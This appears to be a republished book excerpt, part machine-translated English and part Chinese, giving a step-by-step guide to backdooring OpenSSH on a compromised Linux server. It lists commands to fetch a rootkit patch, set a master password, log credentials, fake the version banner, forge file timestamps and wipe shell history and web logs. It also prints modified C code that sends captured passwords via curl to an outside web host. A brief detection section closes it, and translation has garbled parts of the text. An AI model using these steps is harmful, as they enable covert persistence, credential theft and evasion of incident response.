Shulou(Shulou.com)06/02 Report--

Introduction: compared with the Windows,Linux operating system, the password is more difficult to obtain. However, many Linux servers are configured with OpenSSH services. In the case of obtaining root permissions, you can intercept and save their SSH login accounts and passwords by modifying or updating OpenSSH codes, and even leave an invisible backdoor to achieve long-term control of Linux servers.

After many intruders break through a Linux system, they will leave a back door in the system. Using OpenSSH to leave a back door is one of the usual ways for intruders. OpenSSH backdoor is difficult to detect. This article is selected from "Hacker attack and Defense: practical encryption and decryption". We will discuss with you how to add and prevent OpenSSH backdoor.

1 introduction to OpenSSH

OpenSSH is a free and open source implementation of the SSH (Secure Shell) protocol. Many people mistakenly think that OpenSSH is related to OpenSSL, but in fact, the two projects have different purposes and different development teams, and the names are similar only because they share the same development goals. ── provides open source encrypted communication software.

OpenSSH is a sub-project of OpenBSD and its official website address is http://www.openssh.com/. Various versions of OpenSSH can be downloaded from its website.

The SSH protocol family can be used for remote control or for transferring files between computers. The traditional ways to achieve this function, such as Telnet (Terminal Emulation Protocol), RCP, FTP, Rlogin, RSH, are extremely insecure and will use plaintext to transmit passwords. OpenSSH provides server-side daemons and client-side tools to encrypt data during remote controls and file transfers, thus replacing the original similar services. OpenSSH is an implementation of encrypted communication over a computer network using SSH, which replaces the commercial version of the open source scheme provided by SSH Communications Security. In OpenSSH services, sshd is a typical stand-alone daemon, and OpenSSH services can be configured through the "/ etc/ssh/sshd_config" file. OpenSSH supports versions 1.3,1.5 and 2 of the SSH protocol. Since the release of OpenSSH 2.9, the default protocol has been version 2.

2 preparation 01 download openssh-5.9p1.tar.gz

Openssh-5.9p1.tar.gz can be downloaded from http://down1.chinaunix.net/distfiles/openssh-5.9p1.tar.gz.

02 download the backdoor file

The backdoor file download address is http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.. Patch.tar.gz .

03 prepare the Linux virtual machine

Prepare the Linux virtual machine Centos 6.4.

04 View the current version of SSH

At present, the backdoor version of SSH supported on the Internet is less than 5.9. As shown in the following figure, the OpenSSH version information obtained by using the "ssh-V" command is "OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010".

The author has not tested SSH higher than 5.9, but because the value of banner can be modified directly in Patch, this is feasible in theory.

Note: be sure to record the version number here so that this information is camouflaged at compile time.

05 back up the original SSH configuration file

As shown in the figure, back up ssh_config and sshd_config as ssh_config.old and sshd_config.old, respectively. Execute the following file backup command in the Linux terminal.

Mv / etc/ssh/ssh_config / etc/ssh/ssh_config.old mv / etc/ssh/sshd_config / etc/ssh/sshd_config.old06 decompress SSH backdoor

Download sshbd.tgz locally and extract it

Execute the following command.

Tar zxvf sshbd.tgz cd openssh

If you install using the official installation package openssh-5.9p1, you can execute the following command.

Tar zxf openssh-5.9p1.tar tar zxf openssh-5.9p1.path.tar cp openssh-5.9p1.patch/sshbd5.9p1.diff / openssh-5.9p1cd openssh-5.9p1patch

< sshbd5.9p1.diff3 设置SSH后门的登录密码及其密码记录位置 　　在OpenSSH目录中找到includes.h文件，运行"vi includes.h"命令修改"define _SECRET_PASSWD"为我们的登录密码，如图。 　　默认密码记录日志文件保存在"/usr/local/share/0wn"目录下的slog和clog文件中。假设密码为"995430aaa"，代码如下。 define _SECRET_PASSWD " 995430aaa"4 安装并编译后门01 编译和安装 　　运行如下代码。 ./configure -prefix=/usr -sysconfdir=/etc/ssh make && make install 　　openssh-5.9p1需要使用下面的命令进行配置。 ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 　　在编译过程中可能会出现"configure: error: * zlib.h missing - please install first or check config.log"错误。此时，执行"yum install zlib-devel"和"yum install openssl openssl-devel"命令，安装后再次进行编译即可。 02 重启SSHD服务 　　执行"/etc/init.d/sshd restart"命令，重启SSHD服务。 03 还原新配置文件为旧配置文件的时间 　　执行以下命令，使ssh_config和sshd_config文件的修改时间与ssh_config.old和sshd_config.old文件一致。 touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_configtouch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_configmtime(modify time)：最后一次修改文件或目录的时间。ctime(chang time)：最后一次改变文件或目录（改变的是原数据，即属性）的时间，如该文件的inode节点被修改的时间。touch命令除了"-d"和"-t"选项外，都会改变该时间。chmod、chown等命令也能改变该值。atime(access time)：最后一次访问文件或目录的时间。ls -l file：查看文件修改时间。ls -lc file：查看文件状态改动时间。ls -lu file：查看文件访问时间。stat file：文件时间的3个属性。5 登录后门并查看记录的密码文件 　　使用"ssh -l root IP"命令登录服务器，如"ssh -l root 192.168.52.175"。可以使用root的密码，也可以使用后门设置的密码"995430aaa"进行登录。然后，访问"/usr/local/ share/0wn"目录，查看其记录的密码日志文件clog和slog，如下图可以看到SSH登录和本地root账号登录的密码。 　　在实际测试过程中，还需要清除Apache日志。可供参考的日志清除命令如下。 export HISTFILE=/dev/null export HISTSIZE=0 cd /etc/httpd/logs/ sed -i '/192.168.52.175/d' access_log*echo >

/ root/.bash_history / / clear operation log 6 expand password recording method

The previously recorded password can only be seen on the Linux server, that is, the user must have permission to read the file and cannot log in to the server without permission. In this case, the best way is that the recorded user, password, and port can be sent directly to the receiver via email or HTTP (similar to underground industry mail). The specific implementation methods are described below.

01 receiver ssh.php code 02 modifies the contents of the auth-passwd.c file int userauth_passwd (Authctxt * authctxt) {static int attempt = 0; char prompt [150]; char * password; char * pass [200]; char szres [1024] = {0}; FILE * f; char * findport () {FILE * FTopen; char tempBuf [1024] = {0}; char * Filename = "/ etc/ssh/sshd_config" Char * Filetext = "Port"; if ((FTopen = fopen (Filename, "r")) = NULL) {return Filetext;} while (fgets (tempBuf, 1024, FTopen)! = NULL) {if (strstr (tempBuf, Filetext)) {Filetext = tempBuf; break;} memset (tempBuf, 0, 1024);} fclose (FTopen); return Filetext;} const char * host = options.host_key_alias? Options.host_key_alias: authctxt- > host; if (attempt++ > = options.number_of_password_prompts) return 0; if (attempt! = 1) error ("Permission denied, please try again."); snprintf (prompt, sizeof (prompt), ". 30s@%.128s's password:", authctxt- > server_user, host); password = read_passphrase (prompt, 0); strcpy (pass,password) / / copy it to a custom place when intercepting the password to call packet_start (SSH2_MSG_USERAUTH_REQUEST); packet_put_cstring (authctxt- > server_user); packet_put_cstring (authctxt- > service); packet_put_cstring (authctxt- > method- > name); packet_put_char (0); packet_put_cstring (password); memset (password, 0, strlen (password)); xfree (password) Packet_add_padding (64); packet_send (); dispatch_set (SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ,&input_userauth_passwd_changereq); if ((f=fopen ("/ tmp/olog", "a +")! = NULL) {fprintf (f, "username:%s-- > password:%s-- > host:%s-- > port:%s\ n", authctxt- > server_user,pass,authctxt- > host,findport ()); fclose (f) } memset (szres,0,sizeof (szres)); snprintf (szres,sizeof (szres), "/ usr/bin/curl-s-d\" username=%s&password=% s&host=%s&port=%s\ "http://www.antian365.com/ssh.php > / dev/null", authctxt- > server_user,pass, authctxt- > host,findport ()); system (szres); return 1;}

Recompile, and the password is automatically sent to the server after execution. However, the author did not achieve this effect in the actual test. Please visit http://0cx.cc/ssh_get_password.jspx to check and verify the relevant information.

7 precautions against the back door of OpenSSH

The precautions against the OpenSSH back door are as follows.

Reinstall the OpenSSH software and update to the latest version 7.2. Change SSH default login port 22 to a different port. Add a SSH access policy to IPTable. View the command history and clean up the suspicious files. Under conditional conditions, the system can be redone. Change the password of all users of the server to a new strong password.

Run the "ps aux | grep sshd" command to get the PID of the suspicious process, and run the "strace-o aa-ff-p PID" command to trace it. After successfully logging in to SSH, the output of the strace command is generated in the current directory. Use the "grep open aa* | grep-v-e No-e null-e denied | grep WR" command to view the record file. In the above command, filter the error message, / dev/null message, and deny (denied) message to find the file that opened the read-write mode (WR) (because you want to write the recorded password to the file). You can find the location of the SSH backdoor password file recorded in the file in a read-write manner, and use this method to determine whether there is a SSH backdoor. Of course, there are cases where passwords are not recorded, leaving only a universal SSH back door.

8 Summary

Get the version of Linux and its information, as follows.

Cat / etc/issueuname-ar

Get the information about the SSH version and record it, as follows.

Ssh-V > ssh.txt

Download the OpenSSH client and backdoor program with the following command. There is also a version of sshd.tar.gz on the Internet.

Wget http://down1.chinaunix.net/distfiles/openssh-5.9p1.tar.gz wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz

Back up the SSH configuration file with the following command.

Mv / etc/ssh/ssh_config / etc/ssh/ssh_config.old mv / etc/ssh/sshd_config / etc/ssh/sshd_config.old

To install the prerequisite software, the command is as follows.

Yum install-y openssl openssl-devel pam-devel zlib zlib-devel

Unpack and install the patch with the following command.

Tar zxf openssh-5.9p1.tar.gz tar zxf openssh-5.9p1.tar.gz cp openssh-5.9p1.patch/sshbd5.9p1.diff / openssh-5.9p1cd openssh-5.9p1patch

< sshbd5.9p1.diff 　　修改includes.h文件中记录用户名和密码的文件位置及其密码，命令如下。 #define ILOG "/tmp/ilog" //记录登录本机的用户名和密码 #define OLOG "/tmp/olog" //记录本机登录远程的用户名和密码 #define SECRETPW "123456654321" //后门的密码 　　修改version.h文件，使其修改后的版本信息为原始版本，命令如下。 #define SSH_VERSION "填入之前记下来的版本号,伪装原版本" #define SSH_PORTABLE "小版本号" 　　安装并编译，命令如下。 ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 make clean make && make install service sshd restart 　　恢复新配置文件的日期，使其与旧文件的日期一致。对ssh_config和sshd_config文件的内容进行对比，使其配置文件一致，然后修改文件日期。 touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_configtouch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 　　清除操作日志，代码如下。 export HISTFILE=/dev/null export HISTSIZE=0 cd /etc/httpd/logs/ sed -i '/192.168.52.175/d' access_log*echo >

/ root/.bash_history / / clear the operation log

This article is selected from "Hacker attack and Defense: practical encryption and decryption". Click this link to view this book on the official website of the blog.

For more wonderful articles in time, search for "blog viewpoints" on Wechat or scan the QR code below and follow.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.